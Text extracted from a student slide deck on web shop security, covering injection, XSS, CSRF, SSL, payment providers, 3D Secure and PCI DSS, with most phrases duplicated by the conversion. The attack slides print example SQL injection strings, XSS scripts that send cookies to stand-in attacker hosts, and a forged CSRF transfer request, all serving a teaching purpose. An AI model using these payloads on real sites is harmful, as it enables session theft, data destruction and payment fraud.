Web shop security Zlatan Filipusic, Arman Nasufovic, Arturo Quesada Gil, Andres Reyes Navas and Jimmy Sjöstrand

Web shop security

Zlatan Filipusic, Arman Nasufovic, Arturo Quesada Gil, Andres Reyes Navas and

Jimmy Sjöstrand

User Developer / Admin

Web shop security

User perspective

•Sellers trustworthiness•Secure web site – https•Passwords•Viruses / Spyware•Cookies

Payment options

•Credit Card

•Direct internet bank payment

Electronic credit card, E-card

•limited time•limited money

Developing secure homepages

• SSL / https• PSP• 3D Secure• PCI DSS

Hacking & Cracking

Social Engineering

Policies

Physical Security

VULNERABILITIES IN E-COMMERCEVULNERABILITIES IN E-COMMERCEINTRODUCTIONINTRODUCTION

88

e-Commerce grows exponentiallye-Commerce grows exponentially. Principally B2B and B2C.. Principally B2B and B2C. INTERNET must provides the communication at the right time in the right INTERNET must provides the communication at the right time in the right

way.way. As the benefits of a enterprise increase in order to the services that it As the benefits of a enterprise increase in order to the services that it

offers better and faster than their competitors, offers better and faster than their competitors, in the same linein the same line::

• InformationInformation is is MORE SENSITIVEMORE SENSITIVE and and MORE DANGEROUSMORE DANGEROUS in the wrong in the wrong peoplepeople ”Customer information is like gold to marketers”.”Customer information is like gold to marketers”.

• INTERNET SERVICES are growing exponentially too:INTERNET SERVICES are growing exponentially too:

more more COMPLEX COMPLEX software==more software==more PROBLEMS DEVELOPING PROBLEMS DEVELOPING software.software.

++ More More FAST DEVELOPINGFAST DEVELOPING==more ==more POOR SECURITYPOOR SECURITY implementation. implementation.

++ LACK of KNOWLEDGELACK of KNOWLEDGE concerning concerning TO SECURETO SECURE the customer’s the customer’s personal information.personal information.

==WEAKNESSES IN SECURING INFORMATION ARE INCREASINGWEAKNESSES IN SECURING INFORMATION ARE INCREASING

"Your system is only as secure as the people who use it“"Your system is only as secure as the people who use it“

VULNERABILITIES IN E-COMMERCEVULNERABILITIES IN E-COMMERCETHE GENERAL CONTEXTTHE GENERAL CONTEXT

The software environment in web applications are NOT implemented The software environment in web applications are NOT implemented relying on a SECURITY DESIGNrelying on a SECURITY DESIGN

Programmers are not well formed in securing programming techniquesProgrammers are not well formed in securing programming techniques• Weak mechanisms that ensure sanitized inputs and outputs (e.g. improper input Weak mechanisms that ensure sanitized inputs and outputs (e.g. improper input

validation and improper escaping and structured output)validation and improper escaping and structured output) Designers don’t specify an independent and restricted environment for the Designers don’t specify an independent and restricted environment for the

applicationapplication• Undefined policiesUndefined policies for restricting the software environment: for restricting the software environment:

Run privilegesRun privileges total control of the sw environmenttotal control of the sw environment Error messagesError messages disclosure software architecture and implementationdisclosure software architecture and implementation VirtualizationVirtualization Attacks impact more spread into the sw environmnetAttacks impact more spread into the sw environmnet

• Relying on Relying on Security through ObscuritySecurity through Obscurity Software protections mechanisms relying on secrecy == reversing engineering exploitableSoftware protections mechanisms relying on secrecy == reversing engineering exploitable

• Trustworthiness in third partiesTrustworthiness in third parties software software Maintainers and managers don’t asses and implement security in the all Maintainers and managers don’t asses and implement security in the all

software lifecyclesoftware lifecycle • Misuse of the automated/static and manual/dynamic analysis (e.g fuzzers, scanners, Misuse of the automated/static and manual/dynamic analysis (e.g fuzzers, scanners,

pen testing)pen testing)

RESULT:RESULT: "You can’t effectively and consistently manage what you can’t measure, and you can’t "You can’t effectively and consistently manage what you can’t measure, and you can’t measure what you haven’t defined…“measure what you haven’t defined…“ SOFTWARE WEAKNESSESSOFTWARE WEAKNESSES

VULNERABILITIES IN E-COMMERCEVULNERABILITIES IN E-COMMERCEDIFFERENT TECHNIQUES APROACHING WEAKNESSESDIFFERENT TECHNIQUES APROACHING WEAKNESSES

“INJECTION”“INJECTION”

INJECTION attacks happen when INJECTION attacks happen when untrusted datauntrusted data is sent to an is sent to an interpreter interpreter as a part of a command or queryas a part of a command or query

The attacker’s The attacker’s modified datamodified data can can mislead the interpretermislead the interpreter (in the (in the back-end database) back-end database)

• executing unintended command or executing unintended command or • accessing to unauthorized dataaccessing to unauthorized data

Two Front-end application Injection’s attacksTwo Front-end application Injection’s attacks::

1.1. Incorrect filtered escape charactersIncorrect filtered escape characters

2.2. Incorrect type handlingIncorrect type handling

One back-end application Injection’s attack:One back-end application Injection’s attack:1.1. Blind InjectionBlind Injection


“INJECTION EXAMPLES”“INJECTION EXAMPLES”

1.1. Incorrectly filtered escape charactersIncorrectly filtered escape characters

• The next statement is crafted by the attacker for evaluates always like true:The next statement is crafted by the attacker for evaluates always like true:

SELECT * FROM users WHERE name = ‘ ‘ SELECT * FROM users WHERE name = ‘ ‘ OR ‘1’ = ‘1’OR ‘1’ = ‘1’

• In this statement the attacker can force selecting a valid user name, broken In this statement the attacker can force selecting a valid user name, broken the authentication procedurethe authentication procedure

2.2. Incorrect type handlingIncorrect type handling

• The input field is not type constrained (strongly typed), so the attacker can The input field is not type constrained (strongly typed), so the attacker can craft the next query:craft the next query:

SELECT * FROM userinfo WHERE id = “ SELECT * FROM userinfo WHERE id = “ + type_not_constrained_input_value + “ ; “+ type_not_constrained_input_value + “ ; “

• Crafting this statement introducing:Crafting this statement introducing: 1;DROP TABLE ùsers`1;DROP TABLE ùsers`

SELECT * FROM userinfo WHERE id = 1;DROP TABLE ùsers`;SELECT * FROM userinfo WHERE id = 1;DROP TABLE ùsers`;

• In this statement the attacker delete the user’s table in the database, so the In this statement the attacker delete the user’s table in the database, so the integrity of the data has been compromisedintegrity of the data has been compromised. .


“INJECTION EXAMPLES”“INJECTION EXAMPLES”

3.3. Blind injectionBlind injection

The attacker introduces conditional queries in order to reveal The attacker introduces conditional queries in order to reveal information that is not disclose at first, through error messages information that is not disclose at first, through error messages database responses finding any possible Injections attacks attempts:database responses finding any possible Injections attacks attempts:

A typical attempt:A typical attempt:

• The attacker have this informationThe attacker have this information::

http://shopping_site.com/items.php?id=2SELECT title, description, body FROM items WHERE ID = 2SELECT title, description, body FROM items WHERE ID = 2

• He/She sends the next query to the database:He/She sends the next query to the database:

http://shopping_site.com/items.php?id=2 and 1=2 and 1=2SELECT title, description, body FROM items WHERE ID = 2 AND SELECT title, description, body FROM items WHERE ID = 2 AND 1=21=2

• If the attacker If the attacker receives a different pagereceives a different page from the database, he/she from the database, he/she knows that the database knows that the database is vulnerable to Injection.is vulnerable to Injection.

VULNERABILITIES IN THE E-COMMERCEVULNERABILITIES IN THE E-COMMERCEDIFFERENT TECHNIQUES APROACHING WEAKNESSESDIFFERENT TECHNIQUES APROACHING WEAKNESSES

“INJECTION” (OWASP TOP TEN 2010)“INJECTION” (OWASP TOP TEN 2010)

Fire

wal

l

Hardened OS

Web Server

App Server

Fire

wal

l

Dat

abas

es

Leg

acy

Syst

ems

Web

Ser

vice

s

Dir

ecto

ries

Hum

an R

esrc

s

Bill

ing

Custom Code

APPLICATIONATTACK

Net

wor

k L

ayer

App

licat

ion

Lay

er

Acc

ount

s

Fina

nce

Adm

inis

trat

ion

Tra

nsac

tions

Com

mun

icat

ion

Kno

wle

dge

Mgm

t

E-C

omm

erce

Bus

. Fun

ctio

ns

HTTP

requestSQL

query

DB Table

HTTP response

"SELECT * FROM accounts WHERE

acct=‘’ OR 1=1--’"

1. Application presents a form to the 1. Application presents a form to the attackerattacker

2. Attacker sends an attack in the form 2. Attacker sends an attack in the form datadata

3. Application forwards attack to the 3. Application forwards attack to the database in a SQL querydatabase in a SQL query

Account Summary

Acct:5424-6066-2134-4334Acct:4128-7574-3921-0192Acct:5424-9383-2039-4029Acct:4128-0004-1234-0293

4. Database runs query containing 4. Database runs query containing attack and sends encrypted results attack and sends encrypted results back to applicationback to application

5. Application decrypts data as normal 5. Application decrypts data as normal and sends results to the userand sends results to the user

Account:

SKU:

Account:

SKU:


“XSS”“XSS”

XSS (Cross Site Scripting) attacks occur when webapps and XSS (Cross Site Scripting) attacks occur when webapps and attackers takes attackers takes unsanitized dataunsanitized data and they and they sendsend to a to a user’s web user’s web browser.browser.

Attackers and the webapp can execute scripts in the user’s Attackers and the webapp can execute scripts in the user’s browsers for obtain:browsers for obtain:• Session cookies.Session cookies.• Redirect the user another malicious sites. Redirect the user another malicious sites. • Bypass the control access mechanisms (like Bypass the control access mechanisms (like same origin policysame origin policy).).

There are 3 principal variants:There are 3 principal variants:• Non persistent attackNon persistent attack• Persistent attackPersistent attack• DOM oriented attackDOM oriented attack

This vulnerability rely on the user’s browser trustworthiness put This vulnerability rely on the user’s browser trustworthiness put on the webappon the webapp


“XSS NON-PERSISTENT”“XSS NON-PERSISTENT”

Non-persistent attack requires that the user visit any crafted Non-persistent attack requires that the user visit any crafted link or any object containing malicious codelink or any object containing malicious code

Example:Example: ““This attack perform a This attack perform a theft of user’s authorizationtheft of user’s authorization when the when the user is required to introduce the credit card numberuser is required to introduce the credit card number, , in order to obtain access to a Web server in order to obtain access to a Web server stealing the user’s stealing the user’s session ID"session ID"

1.1. The attacker catch the server’s not validate response of the request sent The attacker catch the server’s not validate response of the request sent by the user:by the user:(String) page += "<input name='creditcard' (String) page += "<input name='creditcard' type='TEXT‘value='" + request.getParameter("type='TEXT‘value='" + request.getParameter("CCCC") + "'>";") + "'>";

2.2. The attacker introduce the embebed code in order to redirect the user’s The attacker introduce the embebed code in order to redirect the user’s session ID to an untrusted web site. He/She uses the “session ID to an untrusted web site. He/She uses the “CCCC” field:” field:'><script>document.location='http://www.attacker.com/cgi-'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>‘bin/cookie.cgi?foo='+document.cookie</script>‘

3.3. The attacker receives the user’s session ID in the malicious place and The attacker receives the user’s session ID in the malicious place and

can impersonate the “user’s browser”.can impersonate the “user’s browser”.


“XSS PERSISTENT AND DOM-ORIENTED ATTACK”“XSS PERSISTENT AND DOM-ORIENTED ATTACK” A A persistent attackpersistent attack uses the uses the proper web site to inject the codeproper web site to inject the code into into

the user.the user.

• Viewing some information crafted into a Javascript, the attacker can Viewing some information crafted into a Javascript, the attacker can introduce this piece of embebed code:introduce this piece of embebed code:

<SCRIPT><SCRIPT>

document.location= ‘http://attackerhost.example/cgi-document.location= ‘http://attackerhost.example/cgi-

bin/bin/cookiesteal.cgicookiesteal.cgi?’+document.cookie?’+document.cookie

</SCRIPT></SCRIPT>

A A DOM-oriented attackDOM-oriented attack can can instigateinstigate the user’s browser to execute the user’s browser to execute

pieces of modified DOM controled by the attacker.pieces of modified DOM controled by the attacker.

• In this case, the embebed malicious code can steal the user’s session In this case, the embebed malicious code can steal the user’s session cookie by forcing the user to click:cookie by forcing the user to click:

http://www.vulnerable.site/welcome.html?name==

<script>alert(document.cookie)</script><script>alert(document.cookie)</script>


“CSRF”“CSRF”

CSRF (Cross Site Request Forgery) attacks exploit the CSRF (Cross Site Request Forgery) attacks exploit the webapp’s webapp’s trustworthiness putting in the user’s browserstrustworthiness putting in the user’s browsers

These attacks force an authenticated user on a web site to send These attacks force an authenticated user on a web site to send requests to a server without any knowledge by the userrequests to a server without any knowledge by the user

Web servers often are designed to receive “trusted” requests Web servers often are designed to receive “trusted” requests from from

trusted users without any control mechanisms to verify if they are trusted users without any control mechanisms to verify if they are intended requests:intended requests:

• The attacker can trick the web site making unintended requests by the The attacker can trick the web site making unintended requests by the user and being treated like “trusted requests”user and being treated like “trusted requests”

CSRF together with XSS is a bigger threat because XSS can be CSRF together with XSS is a bigger threat because XSS can be used like the base for CSRF’s attack operating under the “used like the base for CSRF’s attack operating under the “same-same-origin policy “(2 trusted places=same domain and same protocol)origin policy “(2 trusted places=same domain and same protocol)


“CSRF’S ATTACK EXAMPLE”“CSRF’S ATTACK EXAMPLE” EXAMPLE: EXAMPLE: “A user is browsing in a vulnerable web site. He/she needs to “A user is browsing in a vulnerable web site. He/she needs to

transfer money for buy a product. The user is authenticated. How can an transfer money for buy a product. The user is authenticated. How can an attacker compromise the user’s money with a CSRF attack?” attacker compromise the user’s money with a CSRF attack?”

1. 1. The user does a request in the web site, and the request’s content is clear text:The user does a request in the web site, and the request’s content is clear text:

http://vulnsite.com/app/transferFunds?amount=1500&destinationAccount=4673243243

2. 2. The attacker control the traffic and can store information in the web site. He/She The attacker control the traffic and can store information in the web site. He/She receives the request. He construct a new request transfering money from the user’s receives the request. He construct a new request transfering money from the user’s account to the attacker’s account and embebe this code into a “image tag request” account to the attacker’s account and embebe this code into a “image tag request” and stored in the vulnerable web site:and stored in the vulnerable web site:

<imgsrc="http://vulnsite.com/app/transferFunds?<imgsrc="http://vulnsite.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#“width="0" amount=1500&destinationAccount=attackersAcct#“width="0" height="0" />height="0" />

33. . If the user stored the cookie with session info, browsing in the web site while the If the user stored the cookie with session info, browsing in the web site while the user is authenticated and “viewing” the image user is authenticated and “viewing” the image the forged request embebed will allow the forged request embebed will allow from the user’s browser the “authorized” hidden requestfrom the user’s browser the “authorized” hidden request

VULNERABILITIES IN E-COMMERCEVULNERABILITIES IN E-COMMERCESOME STATISTICS (FROM 2008)SOME STATISTICS (FROM 2008)

12186 web applications with 97554 detected vulnerabilities12186 web applications with 97554 detected vulnerabilities

Social EngineeringSocial Engineering

TargetsTargets TekniqueTeknique ConsequenceConsequence PreventionPrevention

Policy MakingPolicy Making

• Purpose StatementPurpose Statement• Applicability and Scope statementApplicability and Scope statement• Effective dateEffective date• ResponsibilitiesResponsibilities• Policy StatementPolicy Statement

• BackgroundBackground• DefinitionsDefinitions

Physical SecurityPhysical Security

Lockup the Server roomsLockup the Server rooms Set up surveillanceSet up surveillance Make sure vulnerable devices are Make sure vulnerable devices are

locked uplocked up Use rack mount serversUse rack mount servers Don’t forget about the Don’t forget about the

workstationsworkstations Keep intuders out of the Keep intuders out of the

computer/server casecomputer/server case

Physical SecurityPhysical Security

Protect portable devicesProtect portable devices Take backups and keep them Take backups and keep them

securesecure Disable the drivesDisable the drives Protect your printersProtect your printers

SSLSSL Secure Sockets LayerSecure Sockets Layer Enables secure data exchange between client and serverEnables secure data exchange between client and server Protocol below the Application layerProtocol below the Application layer Confidentiality (Encryption)Confidentiality (Encryption) Integrity (MAC)Integrity (MAC)

SSL ServicesSSL Services FragmentationFragmentation

Devides data into blocks of 2^14 bytesDevides data into blocks of 2^14 bytes CompressionCompression

Data can be compressed, optionalData can be compressed, optional Message IntegrityMessage Integrity

Keyed hash function with MACKeyed hash function with MAC ConfidentialityConfidentiality

Symmetric key cryptographySymmetric key cryptography FramingFraming

HandshakeHandshake No handshake, no securityNo handshake, no security EnablesEnables exchange of keys exchange of keys Reduces the risk of Man in the middle attacksReduces the risk of Man in the middle attacks Setting upp parametersSetting upp parameters

About 10 steps in the handshakeAbout 10 steps in the handshake• What cipher suites, SSL versions are supportedWhat cipher suites, SSL versions are supported• Client gets the servers public key from the server certificateClient gets the servers public key from the server certificate• Client creates pre master secret, sends it encrypted to the serverClient creates pre master secret, sends it encrypted to the server• Pre master secret creates a master secretPre master secret creates a master secret• Master secret is then used to create session keys and auth keysMaster secret is then used to create session keys and auth keys

MACMAC Message Authentication CodeMessage Authentication Code A hash using the message and authentication keyA hash using the message and authentication key Used to authenticate the sender of a messageUsed to authenticate the sender of a message (Message+Authkey) = Hash(Message+Authkey) = Hash

Putting it all Putting it all togethertogetherExchange of information using SSLExchange of information using SSL

SSL WeaknessesSSL Weaknesses

Cipher suites can be weakCipher suites can be weak Man in the middleMan in the middle KeyjackingKeyjacking Fake certificatesFake certificates

PSP: Payment Service ProviderPSP: Payment Service Provider

3030

DEFINITION OF PSPDEFINITION OF PSP

““PSPs offers merchants online services for accepting electronic PSPs offers merchants online services for accepting electronic payments by a variety of payment methods including credit card, payments by a variety of payment methods including credit card,

bank-based payments such as direct debit, bank transfer, and bank-based payments such as direct debit, bank transfer, and real-time bank transfer based on online banking.”real-time bank transfer based on online banking.”

Solution for problems in connecting e-market with banksSolution for problems in connecting e-market with banks 2 different fee policies2 different fee policies SecuritySecurity

List of PSPsList of PSPs

3D SECURE3D SECURE

DEFINITION OF 3D SECUREDEFINITION OF 3D SECURE

””3D Secure is an XML-Based protocol used as an added layer of 3D Secure is an XML-Based protocol used as an added layer of security for online credit and debit card transactions.”security for online credit and debit card transactions.”

SecuritySecurity Three domain model for authentication:Three domain model for authentication:

• Acquirer DomainAcquirer Domain• Issuer DomainIssuer Domain• Interoperability DomainInteroperability Domain

Based on SETBased on SET

PCI DSSPCI DSSPayment Card Industry Data Security StandardPayment Card Industry Data Security Standard

Security standard to control credit card infoSecurity standard to control credit card info Defined by the PCI SSCDefined by the PCI SSC Unified from:Unified from:

• Visa Card Information SecurityVisa Card Information Security• MasterCard Site Data ProtectionMasterCard Site Data Protection• American Express Data Security Operating PolicyAmerican Express Data Security Operating Policy• Discover Information and ComplianceDiscover Information and Compliance• JBC Data security ProgramJBC Data security Program

ObjectivesObjectives Protected and Unprotected DataProtected and Unprotected Data Security techniquesSecurity techniques

PCI DSSPCI DSSRequirementsRequirements

• Build and maintain a Secure NetworkBuild and maintain a Secure Network1. 1. Install and maintain a firewall configuration to protect cardholder data.Install and maintain a firewall configuration to protect cardholder data.

2. 2. Do not use vendor-supplied defaults for system passwords and other security Do not use vendor-supplied defaults for system passwords and other security parameters.parameters.

• Protect cardholder DataProtect cardholder Data 3. 3. Protect stored cardholder data. Protect stored cardholder data.

4. 4. Encrypt transmissions of cardholder data across open, public networks.Encrypt transmissions of cardholder data across open, public networks.

• Maintain a vulnerability management program Maintain a vulnerability management program 5. 5. Use and regularly update anti-virus software on all systems commonly affected by Use and regularly update anti-virus software on all systems commonly affected by

malware.malware.

6.6. Develop and maintain secure systems and applications. Develop and maintain secure systems and applications.

• Implement strong access control measuresImplement strong access control measures 7. 7. Restrict access to cardholder data by business need-to-know.Restrict access to cardholder data by business need-to-know.

8. 8. Assign a unique ID to each person with computer access.Assign a unique ID to each person with computer access.

9. 9. Restrict physical access to cardholder data.Restrict physical access to cardholder data.

• Regularly monitor and test networksRegularly monitor and test networks10. 10. Track and monitor all access to network resources and cardholder data.Track and monitor all access to network resources and cardholder data.

11. 11. Regularly test security systems and processes.Regularly test security systems and processes.

• Maintain an information security policyMaintain an information security policy12. 12. Maintain a policy that addresses information security.Maintain a policy that addresses information security.

Documents

Web shop security Zlatan Filipusic, Arman Nasufovic, Arturo Quesada Gil, Andres Reyes Navas and Jimmy Sjöstrand